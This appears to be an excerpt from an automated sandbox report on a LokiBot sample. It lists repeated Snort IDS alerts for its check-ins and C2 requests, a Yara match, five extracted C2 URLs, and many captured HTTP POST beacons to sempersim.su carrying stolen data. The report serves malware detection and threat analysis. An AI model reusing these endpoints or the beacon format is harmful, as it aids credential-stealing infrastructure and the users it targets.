              Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49772 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 104.155.55.2:80 -> 192.168.2.3:49772
              Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.3:50778 -> 8.8.8.8:53
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49773 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49773 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49773 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49773 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49773 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 104.155.55.2:80 -> 192.168.2.3:49773
              Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.3:59795 -> 8.8.8.8:53
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49775 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49775 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49775 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49775 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49775 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 104.155.55.2:80 -> 192.168.2.3:49775
              Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.3:59390 -> 8.8.8.8:53
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49776 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49776 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49776 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49776 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49776 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 104.155.55.2:80 -> 192.168.2.3:49776
              Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.3:64816 -> 8.8.8.8:53
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49777 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49777 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49777 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49777 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49777 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 104.155.55.2:80 -> 192.168.2.3:49777
              Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.3:64996 -> 8.8.8.8:53
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49778 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49778 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49778 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49778 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49778 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 104.155.55.2:80 -> 192.168.2.3:49778
              Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.3:52096 -> 8.8.8.8:53
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49780 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49780 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49780 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49780 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49780 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 104.155.55.2:80 -> 192.168.2.3:49780
              Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.3:60640 -> 8.8.8.8:53
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49781 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49781 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49781 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49781 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49781 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 104.155.55.2:80 -> 192.168.2.3:49781
              Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.3:63861 -> 8.8.8.8:53
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49783 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49783 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49783 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49783 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49783 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 104.155.55.2:80 -> 192.168.2.3:49783
              Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.3:50152 -> 8.8.8.8:53
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49787 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49787 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49787 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49787 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49787 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 104.155.55.2:80 -> 192.168.2.3:49787
              Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.3:62724 -> 8.8.8.8:53
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49795 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49795 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49795 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49795 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49795 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 104.155.55.2:80 -> 192.168.2.3:49795
              Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.3:64412 -> 8.8.8.8:53
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49807 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49807 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49807 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49807 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49807 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 104.155.55.2:80 -> 192.168.2.3:49807
              Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.3:62547 -> 8.8.8.8:53
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49832 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49832 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49832 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49832 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49832 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 104.155.55.2:80 -> 192.168.2.3:49832
              Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.3:57442 -> 8.8.8.8:53
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49838 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49838 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49838 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49838 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49838 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 104.155.55.2:80 -> 192.168.2.3:49838
              Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.3:52487 -> 8.8.8.8:53
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49842 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49842 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49842 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49842 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49842 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 104.155.55.2:80 -> 192.168.2.3:49842
              Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.3:58950 -> 8.8.8.8:53
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49850 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49850 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49850 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49850 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49850 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 104.155.55.2:80 -> 192.168.2.3:49850
              Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.3:59065 -> 8.8.8.8:53
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49856 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49856 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49856 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49856 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49856 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 104.155.55.2:80 -> 192.168.2.3:49856
              Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.3:64589 -> 8.8.8.8:53
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49858 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49858 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49858 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49858 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49858 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 104.155.55.2:80 -> 192.168.2.3:49858
              Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.3:55795 -> 8.8.8.8:53
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49865 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49865 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49865 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49865 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49865 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 104.155.55.2:80 -> 192.168.2.3:49865
              Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.3:64635 -> 8.8.8.8:53
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49867 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49867 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49867 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49867 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49867 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 104.155.55.2:80 -> 192.168.2.3:49867
              Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.3:55269 -> 8.8.8.8:53
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49879 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49879 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49879 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49879 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49879 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 104.155.55.2:80 -> 192.168.2.3:49879
              Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.3:63083 -> 8.8.8.8:53
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49892 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49892 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49892 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49892 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49892 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 104.155.55.2:80 -> 192.168.2.3:49892
              Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.3:49775 -> 8.8.8.8:53
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49895 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49895 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49895 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49895 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49895 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 104.155.55.2:80 -> 192.168.2.3:49895
              Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.3:60195 -> 8.8.8.8:53
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49896 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49896 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49896 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49896 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49896 -> 104.155.55.2:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 104.155.55.2:80 -> 192.168.2.3:49896
              Source: Yara matchFile source: 0.2.hfyhigXccT.exe.32002d8.4.raw.unpack, type: UNPACKEDPE
              Source: Malware configuration extractorURLs: http://kbfvzoboss.bid/alien/fre.php
              Source: Malware configuration extractorURLs: http://alphastand.trade/alien/fre.php
              Source: Malware configuration extractorURLs: http://alphastand.win/alien/fre.php
              Source: Malware configuration extractorURLs: http://alphastand.top/alien/fre.php
              Source: Malware configuration extractorURLs: http://sempersim.su/gh20/fre.php
              Source: global trafficHTTP traffic detected: POST /gh20/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 306A36E8Content-Length: 190Connection: close
              Source: global trafficHTTP traffic detected: POST /gh20/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 306A36E8Content-Length: 190Connection: close
              Source: global trafficHTTP traffic detected: POST /gh20/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 306A36E8Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /gh20/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 306A36E8Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /gh20/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 306A36E8Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /gh20/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 306A36E8Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /gh20/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 306A36E8Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /gh20/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 306A36E8Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /gh20/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 306A36E8Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /gh20/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 306A36E8Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /gh20/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 306A36E8Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /gh20/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 306A36E8Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /gh20/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 306A36E8Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /gh20/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 306A36E8Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /gh20/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 306A36E8Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /gh20/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 306A36E8Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /gh20/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 306A36E8Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /gh20/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 306A36E8Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /gh20/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 306A36E8Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /gh20/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 306A36E8Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /gh20/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 306A36E8Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /gh20/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 306A36E8Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /gh20/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 306A36E8Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /gh20/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 306A36E8Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /gh20/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 306A36E8Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /gh20/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 306A36E8Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /gh20/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 306A36E8Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /gh20/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 306A36E8Content-Length: 163Connection: close
